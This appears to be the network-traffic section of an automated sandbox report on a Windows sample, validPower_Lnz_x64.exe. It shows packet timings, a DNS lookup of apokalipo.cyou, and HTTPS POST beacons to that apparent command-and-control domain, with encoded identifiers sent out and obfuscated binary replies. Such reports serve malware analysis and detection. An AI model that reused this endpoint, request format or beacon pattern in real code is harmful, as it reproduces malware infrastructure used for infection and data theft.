                                                          Oct 7, 2024 07:14:57.275363922 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.275933027 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.275964975 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.275980949 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.275993109 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.276053905 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.276070118 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.276103020 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.276154041 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.276237011 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.276237011 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.276273966 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.276297092 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.328130007 CEST49740443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.328170061 CEST44349740188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.328233004 CEST49740443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.328514099 CEST49740443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.328526020 CEST44349740188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.789344072 CEST44349740188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.789400101 CEST49740443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.792057991 CEST49740443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.792066097 CEST44349740188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.792428017 CEST44349740188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.793534040 CEST49740443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.793562889 CEST49740443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.793566942 CEST44349740188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.108139992 CEST44349740188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.108270884 CEST44349740188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.108314037 CEST49740443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.111330032 CEST49740443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.111351013 CEST44349740188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.111365080 CEST49740443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.111370087 CEST44349740188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.222433090 CEST49741443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.222496033 CEST44349741188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.222575903 CEST49741443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.223175049 CEST49741443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.223193884 CEST44349741188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.682810068 CEST44349741188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.682879925 CEST49741443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.684161901 CEST49741443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.684175968 CEST44349741188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.684601068 CEST44349741188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.687969923 CEST49741443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.688031912 CEST49741443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.688038111 CEST44349741188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.981493950 CEST44349741188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.981565952 CEST44349741188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.981776953 CEST49741443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.982177019 CEST49741443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.982227087 CEST44349741188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.982258081 CEST49741443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.982273102 CEST44349741188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:41.349595070 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:41.349632978 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:41.349726915 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:41.350963116 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:41.350984097 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:41.838856936 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:41.838957071 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:41.840073109 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:41.840086937 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:41.840420961 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:41.890172958 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:41.902566910 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:41.902590990 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:41.902690887 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.250319004 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.250377893 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.250415087 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.250421047 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.250454903 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.250494957 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.250497103 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.250508070 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.250540018 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.250715971 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.250773907 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.250806093 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.250806093 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.250817060 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.250850916 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.251497984 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.296416998 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.296449900 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.342439890 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.342478991 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.342508078 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.342516899 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.342556000 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.342603922 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.342662096 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.342703104 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.342709064 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.342803955 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.342840910 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.342848063 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.343542099 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.343580961 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.343589067 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.343595028 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.343633890 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.343640089 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.344335079 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.344372988 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.344374895 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.344383001 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.344432116 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.344436884 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.345163107 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.345196009 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.345201015 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.345210075 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.345247984 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.345253944 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.345294952 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.345362902 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.345367908 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.345412016 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.345634937 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.346299887 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.346317053 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.402796984 CEST49979443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.402832985 CEST44349979188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.402892113 CEST49979443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.403179884 CEST49979443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.403189898 CEST44349979188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.869723082 CEST44349979188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.869808912 CEST49979443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.871571064 CEST49979443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.871577024 CEST44349979188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.871905088 CEST44349979188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.872596025 CEST49979443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.872628927 CEST49979443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.872632027 CEST44349979188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:43.173012972 CEST44349979188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:43.173130989 CEST44349979188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:43.173381090 CEST49979443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:43.173440933 CEST49979443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:43.173456907 CEST44349979188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:43.173470974 CEST49979443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:43.173477888 CEST44349979188.114.96.3192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 7, 2024 07:14:56.228621006 CEST | 51139 | 53 | 192.168.2.4 | 1.1.1.1
Oct 7, 2024 07:14:56.251200914 CEST | 53 | 51139 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 7, 2024 07:14:56.228621006 CEST | 192.168.2.4 | 1.1.1.1 | 0x7500 | Standard query (0) | apokalipo.cyou | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 7, 2024 07:14:56.251200914 CEST | 1.1.1.1 | 192.168.2.4 | 0x7500 | No error (0) | apokalipo.cyou | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 07:14:56.251200914 CEST | 1.1.1.1 | 192.168.2.4 | 0x7500 | No error (0) | apokalipo.cyou | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
• apokalipo.cyou
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49739 | 188.114.96.3 | 443 | 344 | C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 05:14:56 UTC | 367 | OUT | POST /watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZzsLLytC%2FMtKEkDEIiMG%2BNOJ3DYSue3YuBdMbTrtqKKdsg%2BC%2Fobe9lLJF33efnkG HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
    Content-Length: 96
    Host: apokalipo.cyou
2024-10-07 05:14:56 UTC | 96 | OUT | Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 00 2d 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
    Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
2024-10-07 05:14:57 UTC | 570 | IN | HTTP/1.1 200 OK
    Date: Mon, 07 Oct 2024 05:14:57 GMT
    Transfer-Encoding: chunked
    Connection: close
    op: QjJpYf7JSNeFgfzDoE7rEVRGSvoCuywFgi99gSR9vR/CKS5/bTBtoujmY2Yutg
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rCeXhY3XTz3Btayob4MNB79Z9ACbwtl792beGcVq8SfwyD%2FYiNYiXskEBr0Iw9Nz3wxwO0dw3do63v6Vp4QIGnYMXWsyNFuEIG9TAwNTiUYOagGG41mNtKcKEbvCgqodKw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ceb6919389b32f4-EWR
2024-10-07 05:14:57 UTC | 17 | IN | Data Raw: 63 0d 0a c5 5a 00 00 00 00 00 00 00 00 00 00 0d 0a
    Data Ascii: cZ
2024-10-07 05:14:57 UTC | 1369 | IN | Data Raw: 33 37 64 32 0d 0a 40 69 69 27 14 00 60 08 27 00 21 07 08 bb bb 21 07 f6 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 5e 69 6d 60 5a 42 4f 50 7a 62 6f 7a 65 69 7b 69 7e 22 68 50 7c 6d 7f 7f 7b 63 7e 68 7f 22 69 62 6f 61 6d 7f 78 69 7e 14 00 7f 09 34 00 ef 08 08 bb bb ef 08 4f 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 6f 63 61 22 60 65 6e 69 7e 78 75 22 66 6d 74 74 50 45 62 68 69 74 69 68 48 4e 50 6a 65 60 69 53 53 3c 22 65 62 68 69 74 69 68 68 6e 22 60 69 7a 69 60 68 6e 14 00 e4 09 07 00 28 00 08 bb bb 28 00 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 4f 59 5e 5e 49 42 58 10 00 fa 07 04 00 d4 0a 04 d4 d4 d4 0a 3f 42 0d 1d 19 1d 0c ce de 45 da c5 09 bc 5a 10 00 db 02 04 00 88 00 04 d4 d4 88 00 88 42 0d 1d 19 1d 0c 04 fc 2f de 0f 2b d6 5e 10 00 85 01 04 00 21
    Data Ascii: 37d2@ii'`'!!BC{^im`ZBOPzbozei{i~"hP|m{c~h"iboamxi~4OBC{oca"`eni~xu"fmttPEbhitihHNPje`iSS<"ebhitihhn"`izi`hn((BC{OY^^IBX?BEZB/+^!
2024-10-07 05:14:57 UTC | 1369 | IN | Data Raw: 5b 65 62 5a 42 4f 38 14 00 64 00 08 00 76 03 08 ba ba 76 03 4f 42 0d 1d 19 1d 0c 48 a9 8a c2 19 10 49 37 31 79 71 0c 40 61 e9 58 10 00 fe 01 04 00 56 0a 04 d4 d4 56 0a f6 42 0d 1d 19 1d 0c 55 da 48 7a 5e 0d b1 fa 14 00 a1 01 05 00 9e 0a 08 bb bb 9e 0a 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 26 22 60 63 6b 10 00 6d 03 04 00 45 09 04 d4 d4 45 09 0b 42 0d 1d 19 1d 0c 46 d6 86 5f 4c 05 7f df 10 00 bb 04 04 00 95 0b 04 d4 d4 95 0b 4f 42 0d 1d 19 1d 0c 78 dc 93 fa 73 0b 6a 7a 14 00 dd 01 08 00 7a 03 08 bb bb 7a 03 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 5b 69 6e 2c 48 6d 78 6d 14 00 3e 04 0c 00 67 09 08 bb bb 67 09 f6 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 79 60 78 7e 6d 7a 62 6f 22 65 62 65 10 00 a5 09 04 00 11 09 04 d4 d4 11 09 2c 42 0d 1d 19 1d
    Data Ascii: [ebZBO8dvvOBHI71yq@aXVVBUHz^BC{&"`ckmEEBF_LOBxsjzzzBC{[in,Hmxm>ggBC{y`x~mzbo"ebe,B
2024-10-07 05:14:57 UTC | 1369 | IN | Data Raw: ee 03 9a 99 c4 68 65 7f 6f 63 7e 68 68 69 7a 69 60 63 7c 61 69 62 78 50 40 63 6f 6d 60 2c 5f 78 63 7e 6d 6b 69 50 60 69 7a 69 60 68 6e 10 00 34 04 04 00 4a 09 04 d4 d4 4a 09 3f 42 0d 1d 19 1d 0c bd ed 00 92 b6 3a f9 12 14 00 d5 08 11 00 ba 00 08 bb bb ba 00 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 6f 64 7e 63 61 65 79 61 53 6e 7e 63 7b 7f 69 7e 7f 14 00 9a 0a 15 00 b2 0b 08 bb bb b2 0b 0b 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 7f 64 63 7e 78 6f 79 78 7f 21 6f 79 7f 78 63 61 22 66 7f 63 62 10 00 cb 09 04 00 73 08 04 d4 d4 73 08 4f 42 0d 1d 19 1d 0c b6 d6 8f fe bd 01 76 7e 14 00 13 04 09 00 4c 06 08 bb bb 4c 06 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 41 4d 42 45 4a 49 5f 58 26 14 00 6e 08 06 00 b3 0a 08 bb bb b3 0a f6 42 0d 1d 19 1d 0c b0 43 7b
    Data Ascii: heoc~hhizi`c|aibxP@com`,_xc~mkiP`izi`hn4JJ?B:BC{od~caeyaSn~c{i~BC{dc~xoyx!oyxca"fcbssOBv~LLBC{AMBEJI_X&nBC{
2024-10-07 05:14:57 UTC | 1369 | IN | Data Raw: d4 56 04 67 42 0d 1d 19 1d 0c 2a 72 1f 06 21 a5 e6 86 10 00 16 07 04 00 5b 04 04 d4 d4 5b 04 0b 42 0d 1d 19 1d 0c 18 76 bf bc 18 a1 46 3c 14 00 eb 05 04 00 36 08 08 bb bb 36 08 2c 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 63 7c 69 62 14 00 b0 01 08 00 10 00 08 ba ba 10 00 4f 42 0d 1d 19 1d 0c f0 84 e7 0b 9d 8d f7 7e 89 54 1c c5 c4 fc 57 11 10 00 37 06 04 00 e3 02 04 d4 d4 e3 02 0b 42 0d 1d 19 1d 0c db 8c 3a 9d d0 5b c3 1d 14 00 7e 02 11 00 02 00 08 bb bb 02 00 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 6f 64 7e 63 61 65 79 61 53 6e 7e 63 7b 7f 69 7e 7f 14 00 da 03 0c 00 62 08 08 bb bb 62 08 0b 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 68 65 7f 6f 63 7e 68 26 22 69 74 69 14 00 b4 01 08 00 03 02 08 ba ba 03 02 f6 42 0d 1d 19 1d 0c ef 2d 39 3e 90 bb b2 5a
    Data Ascii: VgB*r![[BvF<66,BC{c|ibOB~TW7B:[~BC{od~caeyaSn~c{i~bbBC{heoc~h&"itiB-9>Z
2024-10-07 05:14:57 UTC | 1369 | IN | Data Raw: 38 3d 3f 3f 3c 3a 35 3c 35 34 34 3c 3c 3a 38 14 00 1a 08 02 00 2c 06 08 bb bb 2c 06 4f 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 68 6e 14 00 95 0a 08 00 28 07 08 bb bb 28 07 f0 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 7c 7e 63 6a 65 60 69 7f 14 00 ef 0a 09 00 d8 04 08 bb bb d8 04 3f 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 5f 78 69 6d 61 5c 6d 78 64 14 00 91 0b 08 00 e5 04 08 ba ba e5 04 2c 42 0d 1d 19 1d 0c a0 be 23 9b 2e 02 9a 1d d9 6e d8 55 77 73 3a 72 10 00 4a 00 04 00 76 00 04 d4 d4 76 00 88 42 0d 1d 19 1d 0c 0d d4 6a 5b 06 03 93 db 10 00 65 07 04 00 49 02 04 d4 d4 49 02 88 42 0d 1d 19 1d 0c 80 f5 15 d4 8a c3 19 51 14 00 58 02 10 00 54 00 08 bb bb 54 00 2b 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 5f 43 4a 58 5b 4d 5e 49 50 43 7c 69 62 5a 5c 42 14
    Data Ascii: 8=??<:5<544<<:8,,OBC{hn((BC{|~cje`i?BC{_xima\mxd,B#.nUws:rJvvBj[eIIBQXTT+BC{_CJX[M^IPC|ibZ\B
2024-10-07 05:14:57 UTC | 1369 | IN | Data Raw: 3b 35 34 3f 3d 39 38 3f 3c 34 34 3d 3f 35 14 00 d5 05 0b 00 05 04 08 bb bb 05 04 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 4e 7e 6d 7a 69 5b 6d 60 60 69 78 14 00 3e 03 0a 00 19 06 08 bb bb 19 06 72 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 5b 65 62 5f 4f 5c 22 65 62 65 14 00 ab 06 0f 00 fe 0a 08 bb bb fe 0a 4f 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 4f 63 65 62 63 61 65 50 4f 63 65 62 63 61 65 14 00 f3 03 04 00 ee 05 08 bb bb ee 05 4f 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 26 22 68 6e 14 00 7d 0a 1e 00 e2 0a 08 bb bb e2 0a 0b 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 61 69 7f 7f 69 62 6b 69 7e 7f 50 48 65 7f 6f 63 7e 68 50 48 69 7a 69 60 63 7c 61 69 62 78 14 00 36 0b 1f 00 0a 02 08 bb bb 0a 02 f6 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 79 7a 62
    Data Ascii: ;54?=98?<44=?5BC{N~mzi[m``ix>rBC{[eb_O\"ebeOBC{OcebcaePOcebcaeOBC{&"hn}BC{aiibki~PHeoc~hPHizi`c|aibx6BC{yzb
2024-10-07 05:14:57 UTC | 1369 | IN | Data Raw: 65 79 61 53 6e 7e 63 7b 7f 69 7e 7f 14 00 7c 00 05 00 8c 0a 08 bb bb 8c 0a 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 26 22 60 63 6b 14 00 8d 07 09 00 4d 0b 08 bb bb 4d 0b f0 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 7f 69 6f 61 63 68 22 68 6e 10 00 38 0b 04 00 d9 09 04 d4 d4 d9 09 4f 42 0d 1d 19 1d 0c 35 be f6 58 3e 69 0f d8 14 00 20 09 23 00 8c 04 08 bb bb 8c 04 0b 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 68 65 7f 6f 63 7e 68 6f 6d 62 6d 7e 75 50 40 63 6f 6d 60 2c 5f 78 63 7e 6d 6b 69 50 60 69 7a 69 60 68 6e 14 00 68 0a 0e 00 23 06 08 bb bb 23 06 f0 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 6f 63 63 67 65 69 7f 22 7f 7d 60 65 78 69 14 00 36 03 1f 00 1c 00 08 bb bb 1c 00 72 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 6a 78 7c 50 4a 65 60 69 56 65 60 60
    Data Ascii: eyaSn~c{i~|BC{&"`ckMMBC{ioach"hn8OB5X>i #BC{heoc~hombm~uP@com`,_xc~mkiP`izi`hnh##BC{occgei"}`exi6rBC{jx|PJe`iVe``
2024-10-07 05:14:57 UTC | 1369 | IN | Data Raw: 60 5a 42 4f 14 00 89 08 01 00 26 06 08 bb bb 26 06 4f 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 26 10 00 68 09 04 00 b8 03 04 d4 d4 b8 03 88 42 0d 1d 19 1d 0c dd df 80 0a d6 08 79 8a 10 00 7a 09 04 00 b4 02 04 d4 d4 b4 02 88 42 0d 1d 19 1d 0c 83 1c 30 42 89 2a 3c c7 10 00 15 04 04 00 5c 00 04 d4 d4 5c 00 2b 42 0d 1d 19 1d 0c a1 b2 32 22 ab 61 cb a2 14 00 cb 07 08 00 40 05 08 ba ba 40 05 f6 42 0d 1d 19 1d 0c bb 3e bc 17 e6 fc f5 78 c2 ee 47 d9 bf 8d 55 17 14 00 74 05 07 00 ae 01 08 bb bb ae 01 0b 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 79 7f 69 7e 78 6d 6b 10 00 37 08 04 00 39 02 04 d4 d4 39 02 2b 42 0d 1d 19 1d 0c 5f b9 47 84 55 6a be 04 10 00 b3 04 04 00 0f 00 04 d4 d4 0f 00 88 42 0d 1d 19 1d 0c 80 28 86 c6 8a 1e 8a 43 10 00 1f 0b 04 00 06 06 04 d4 d4
                                                          Data Ascii: `ZBO&&OBC{&hByzB0B*<\\+B2"a@@B>xGUtBC{yi~xmk799+B_GUjB(C


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          1 | 192.168.2.4 | 49740 | 188.114.96.3 | 443 | 344 | C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-10-07 05:14:57 UTC | 438 | OUT | POST /watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZzsLLytC%2FMtKEkDEIiMG%2BNOJ3DYSue3YuBdMbTrtqKKdsg%2BC%2Fobe9lLJF33efnkG HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                          title: QjJpYf7JSNeFgfzDoE7rEVRGSvoCuywFgi99gSR9vR/CKS5/bTBtoujmY2Yutg
                                                          Content-Length: 53
                                                          Host: apokalipo.cyou
                                                          2024-10-07 05:14:57 UTC | 53 | OUT | Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 03 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                          Data Ascii:
                                                          2024-10-07 05:14:58 UTC | 500 | IN | HTTP/1.1 200 OK
                                                          Date: Mon, 07 Oct 2024 05:14:58 GMT
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gEmhIf9syJ6ik3v4al2ivhvNXtcloAN3kklEITEkxRXLQx9zg4cWdMQFOtk22p9YDCxkMKCXYEA9Tu1gUJvP5YMnqjUYFlXhRaeaeKNz1B856i1Cz28OpfxkFAvEfTxAGw%3D%3D"}],"group":"cf-nel","max_age":604800}
